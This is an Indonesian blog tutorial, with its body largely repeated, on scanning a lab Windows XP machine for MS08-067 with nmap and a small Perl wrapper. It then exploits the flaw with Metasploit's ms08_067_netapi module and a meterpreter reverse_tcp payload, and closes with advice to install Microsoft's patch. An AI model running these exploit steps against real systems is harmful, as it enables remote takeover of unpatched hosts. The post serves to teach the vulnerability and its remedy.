7:16 PM
Unknown
Langsung saja, berdasarkan pengalaman saya, setelah install Windows
XP, saya kira aman – aman saja dan ternyata di website resmi microsoft
menyebutkan vulnerability pada netapi32.dll / ms08_067. Vulnerability
ini ditemukan pada tahun 2008 di CVE-2008-4250. “An
attacker could exploit this vulnerability without authentication to run
arbitrary code. It is possible that this vulnerability could be used in
the crafting of a wormable exploit” inilah yang
disebutkan di situs Microsoft. Saya akan memberikan step by step untuk
mengidentifikasi vulnerability netapi32.dll dan patching system :
Skenario
Attacker : Ubuntu 10.04
Target : Windows XP SP 2 Di Virtualbox
1. Download Nmap
Ketik ini pada konsole termina
l
2. Untuk melakukan analisa pada window, saya membuat sebuah code sederhana dari Perl dan memanfaatkan perintah nmap. Kita tidak perlu install Perl di ubuntu karena default Perl sudah terinstall. Copas kode berikut di gedit dan save dengan nama smb_scan.pl :
Meskipun tanpa code script Perl tersebut kita bisa mengetikkan perintah ini pada terminal konsole
nmap –script smb-check-vulns.nse -p445
Kenapa saya mengemasnya kedalam Perl, soalnya saya sendiri sering lupa sama perintah nmap. Maka alternatifnya adalah dengan membuat code sederhana tersebut. hehehehe..
3. Jalankan Code Tersebut
Proses scanning sudah selesai, saatnya membuka laporan scanning.
Inilah contoh isi dari hasil.txt
Lihatlah pada line 10
MS08-067: VULNERABLE
Ternyata target memiliki vulnerability ms08_067, dengan memanfaatkan vulnerability tersebut kita bisa melakukan remote system Windows dengan memakai Metasploit
4. Proses Exploit Metasploit Untuk Mendapatkan System Target
DOWNLOAD METASPLOIT
Keterangan:
search ms08_067 : Pencarian vulnerability ms08_067 berdasarkan data Metasploit
use exploit/windows/smb/ms08_067_netapi : Metode pilihan exploit setelah proses search
set payload windows/meterpreter/reverse_tcp : Payload metasploit, untuk memilih payload “show payloads”
set LHOST : IP Penyerang
set RHOST : IP Target
5. Patching Vulnerability Pada MS08_067 Di Windows
Jangan biarkan Windows kita memiliki vulnerability ms08_067, sangat membahayakan jika ada seorang attacker mengambil alih system32, data pribadi kita bisa saja di hapus, memasang keyloger untuk mencuri informasi, memasang backdoor, mengerikan sekali.
Untuk patching silahkan download dan install dari situs resmi Microsoft
patch ms08_067
Download SMB Scanner Vulnerability
http://pastebin.com/Qdxyra2n
Skenario
Attacker : Ubuntu 10.04
Target : Windows XP SP 2 Di Virtualbox
1. Download Nmap
Ketik ini pada konsole termina
l
sudo su apt-get install nmap
2. Untuk melakukan analisa pada window, saya membuat sebuah code sederhana dari Perl dan memanfaatkan perintah nmap. Kita tidak perlu install Perl di ubuntu karena default Perl sudah terinstall. Copas kode berikut di gedit dan save dengan nama smb_scan.pl :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
#!/usr/bin/perl
# Author : h3ll0s
# Date : 30 Maret 2012
# SMB Scanning Vulnerabillity
# Used nmap --script smb-check-vulns.nse -p445 <host>
# Spesial Thank's To : [3rr0r c0de | PasuruanCyber] [BinusHacker]
# http://www.nmap.org
use strict;
system('cls','clear');
system('title SMB Scanning.....');
print"\n";
print "\t//+ + + + + + + + + + + + + + + + + +//\n";
print "\n";;
print "\t = SMB Scanning Vulnerability =\n";
print "\n";;
print "\t//+ + + + + + + + + + + + + + + + + +//\n";
print "\n";;
print "Masukkan Host : ";
chomp(my $net =
my $host = $net;
print "Menunggu Proses Scan\n";
print "$host\n";
`nmap --script smb-check-vulns.nse -p445 '$host' >> hasil.txt`;
print "Selesai";
|
nmap –script smb-check-vulns.nse -p445
Kenapa saya mengemasnya kedalam Perl, soalnya saya sendiri sering lupa sama perintah nmap. Maka alternatifnya adalah dengan membuat code sederhana tersebut. hehehehe..
3. Jalankan Code Tersebut
1
2
3
4
5
6
7
8
9
10
11
12
13
|
root@h3ll0s:~# perl smb_scan.pl
//+ + + + + + + + + + + + + + + + + +//
= SMB Scanning Vulnerability =
//+ + + + + + + + + + + + + + + + + +//
Masukkan Host : # Isikan IP host target yang ingin di scan, misal 192.168.x.x
Menunggu Proses Scan
192.168.x.x
Selesai
root@h3ll0s:~#
|
1
2
3
|
root@h3ll0s:~#ls
smb_scan.pl hasil.txt
root@h3ll0s:~# gedit hasil.txt
|
MS08-067: VULNERABLE
Ternyata target memiliki vulnerability ms08_067, dengan memanfaatkan vulnerability tersebut kita bisa melakukan remote system Windows dengan memakai Metasploit
4. Proses Exploit Metasploit Untuk Mendapatkan System Target
DOWNLOAD METASPLOIT
search ms08_067 : Pencarian vulnerability ms08_067 berdasarkan data Metasploit
use exploit/windows/smb/ms08_067_netapi : Metode pilihan exploit setelah proses search
set payload windows/meterpreter/reverse_tcp : Payload metasploit, untuk memilih payload “show payloads”
set LHOST : IP Penyerang
set RHOST : IP Target
5. Patching Vulnerability Pada MS08_067 Di Windows
Jangan biarkan Windows kita memiliki vulnerability ms08_067, sangat membahayakan jika ada seorang attacker mengambil alih system32, data pribadi kita bisa saja di hapus, memasang keyloger untuk mencuri informasi, memasang backdoor, mengerikan sekali.
Untuk patching silahkan download dan install dari situs resmi Microsoft
patch ms08_067
Download SMB Scanner Vulnerability
http://pastebin.com/Qdxyra2n
Posted in: 
0 sok atuh ngoment:
Posting Komentar
komen sebanyak-banyaknya